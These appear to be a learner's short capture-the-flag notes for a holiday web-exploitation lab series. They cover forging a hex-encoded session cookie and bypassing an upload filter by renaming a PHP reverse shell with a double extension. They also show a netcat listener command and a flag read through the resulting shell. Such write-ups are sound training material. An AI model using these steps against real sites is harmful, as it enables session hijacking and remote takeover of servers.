[Day 1] Web Exploitation: A Christmas Crisis [encoding]

1. Register and log in
2. Check cookies
3. Decode using Cyberchef
   • All numbers and early-in-the-alphabet letters → hex
4. Recognise format
5. Adjust username and re-encode using Cyberchef
6. Replace cookie value and refresh page
7. Turn everything on → success!

[Day 2] Web Exploitation: The Elf Strikes Back! [file upload]

1. Create exploit script as described
2. Go to URL including GET request
   • http://<url>/?id=<id-token>
3. Check source code for upload types
4. Rename script to bypass filter
   • $ mv php-reverse-shell.php php-reverse-shell.jpg.php
5. Upload file. Simple message "File received successfully!"
   1. Check Burp Suite history - the POST was to /upload, so perhaps /uploads/? Test: http://10.10.35.237/uploads/ → success!
   2. Also checked page source, find http://10.10.35.237/assets/js/upload.js. It's obfuscated, but so use https://beautifier.io/ and http://jsnice.org/ to make sense of it. However, doesn't seem to give much.
   3. Hints suggest using a directory brute-forcer
6. Set up netcat listener: $ sudo nc -lvnp 443
7. Click file from http://10.10.35.237/uploads/, or visit full URL http://10.10.35.237/uploads/php-reverse-shell.jpg.php
8. Check netcat, find shell
9. sh-4.4$ cat /var/www/flag.txt → success!

[Day 3] Web Exploitation: Christmas Chaos [brute force]